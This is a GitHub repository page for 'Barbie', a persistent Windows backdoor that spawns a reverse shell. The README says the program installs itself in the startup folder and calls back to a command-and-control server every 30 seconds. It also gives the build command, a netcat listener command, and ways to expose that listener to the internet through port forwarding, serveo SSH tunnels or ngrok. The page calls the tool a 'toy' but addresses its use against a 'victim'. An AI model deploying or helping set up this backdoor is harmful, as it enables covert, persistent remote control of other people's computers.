Skip to content

komodoooo/Barbie

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

4 Commits
 
 
 
 
 
 

Repository files navigation

Barbie

A simple, persisent windows toy backdoor spawning a reverse shell.

Once the victim starts the executable it locates itself on default startup programs directory,
then it tries to connect to establish a connection every 30 seconds.

Setup

Edit the 8 and 9 lines with your own C2 server and port.

Compile

gcc barbie.c -o startupsrvc -w -lws2_32 -mwindows

Setting up your machine as temporary C2 server

  1. First start a TCP listener on your localhost for incoming connections.
    With netcat: nc -lvnp <PORT>

  2. Now you have to expose your localhost on the internet, there are various methods to do this:

    • Setting up port forwarding by opening the choosen port on your modem router (unless you're under a Carrier-grade NAT)
    • Using a reverse proxy to start a TCP tunnel:
      • Serveo through SSH: ssh -R <SERVEO PORT>:localhost:<PORT> serveo.net
      • Ngrok: ngrok tcp <PORT>

Post exploitation

Here

Releases

No releases published

Packages

No packages published

Languages